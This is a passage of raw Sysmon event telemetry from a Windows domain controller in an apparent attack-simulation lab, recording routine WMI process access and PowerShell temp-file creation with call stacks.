10341000x80000000000000002242329Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242328Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6DD2-603E-CEAA-00000000AD01}3944ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0ahdhxpj.yxd.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242327Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242326Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242325Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242324Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242323Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-D1AA-00000000AD01}5496C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242322Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-D1AA-00000000AD01}5496C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002242321Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6DD2-603E-CAAA-00000000AD01}12336ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242320Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242319Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6DD2-603E-CEAA-00000000AD01}3944ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_kqgsnonu.fuj.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242318Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242317Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242316Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242315Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242314Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242313Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242312Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242311Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6DD2-603E-D1AA-00000000AD01}549611604C:\Windows\system32\conhost.exe{05ADC7E1-6DD2-603E-D0AA-00000000AD01}7532C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242310Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242309Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242308Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242307Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-CCAA-00000000AD01}14264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242306Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-CCAA-00000000AD01}14264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242305Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 